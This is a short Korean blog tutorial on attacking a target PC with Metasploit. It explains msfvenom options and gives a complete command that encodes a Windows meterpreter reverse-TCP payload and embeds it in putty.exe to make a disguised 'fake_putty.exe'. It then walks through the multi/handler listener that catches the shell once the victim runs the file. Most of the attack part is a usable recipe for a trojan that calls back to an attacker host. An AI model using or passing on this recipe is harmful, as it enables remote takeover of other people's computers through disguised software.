Server/보안

Kali Linux - 악성코드를 이용한 공격(Metasploit 이용)

heyoon2j 2019. 7. 10. 21:08

■ 악성코드를 이용하여 공격

- 공격 대상에 악성코드를 심어 공격하는 방법

 

○ Metasploit 이용

msfvenom : payload 생성 및 인코딩에 유용하게 사용할 수 있는 도구이다.

- #msfvenom -l encoder : 인코딩 리스트를 출력한다.

- -a : 아키텍처, 32bit인 경우 x86

- --platform : 플랫폼

- -p : payload

- lhost : Local Host 설정, payload에서 필요한 옵션

lport : Local Port 설정, payload에서 필요한 옵션

- -f : 형태

- -e : 인코딩 방법, 리스트에서 확인한 것 중에 사용하면 된다.

- -i : 인코딩 횟수

- -o :  설정한 위치와 이름으로 File 생성

- 생성한 File(악성코드가 담긴)을 공격할 대상에 옮긴다.

 

Ex>

#msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=8888 -e x64/zutto_dekiru -i 3 -x putty.exe -f exe -o /root/fake_putty.exe

 

- msfconsole 실행

 

- user exploit/multi/handler : 여러 개의 모듈을 사용할 때 사용한다.

- payload 설정(File에 설정한 값과 맞아야 된다)

 

- option 설정(File에 설정한 값과 맞아야 된다)

 

- run을 하면 대기상태가 된다.

 

- 공격 대상 PC에서 악성파일을 실행시킨다.

 

- 위와 같이 Open 되었다는 내용과 meterpreter로 변경이 된다.

- 해킹이 된 것이다